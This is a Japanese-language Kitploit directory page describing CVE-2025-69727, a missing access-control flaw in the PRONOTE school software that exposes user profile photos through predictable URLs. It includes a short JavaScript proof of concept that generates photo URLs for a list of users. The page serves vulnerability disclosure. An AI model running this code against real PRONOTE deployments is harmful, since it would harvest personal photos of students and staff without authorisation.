Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/0xzerosec/cve-2025-69727
偵察脆弱性分析情報収集ウェブセキュリティ設定ミス
GitHub0xzerosec/cve-2025-69727

CVE-2025-69727

CVE-2025-69727

リポジトリを見る
25ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
CVE-2025-69727 — CVE-2025-69727 | Kitploit

CVE-2025-69727

製品ベンダー

INDEX-EDUCATION

影響を受ける製品コードベース

PRONOTE - 202X.X.X < 2025.2.8

説明

INDEX-EDUCATION PRONOTE 2025.2.8 より前のバージョンには、不適切なアクセス制御の脆弱性が存在します。影響を受けるコンポーネント(composeUrlImgPhotoIndividu)は、ユーザーIDや名前などの予測可能な識別子のみに基づいて、ユーザーのプロフィール画像への直接URLを構築することを可能にします。これらのURLの生成やアクセス時に認証チェックが欠如しており、レート制限もないため、認証されていないまたは権限のないユーザーが、推測または既知の識別子を使ってリクエストを作成することで、ユーザーのプロフィール画像を取得する可能性があります。

PoC

root@kitploit:~
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";

IE.fModule({
  f: function (exports, require, module, global) {
    const ObjetElement = require("ObjetElement");
    const AccesApp = global.GApplication;

    const comm = AccesApp.communication;

    for (const obj of arr) {
      const path = comm.composeUrlFichierExterne(
        obj.L.replace(/[\s]/gi, "_") + ".jpg",
        new ObjetElement.ObjetElement("", obj.N)
      );

      const url = `${base}/${path}`;

      console.log(url);
    }
  },
  fn: "testIEmodule.js",
});

発見者

  • raphckrman
  • GameCreep35
ツールをダウンロード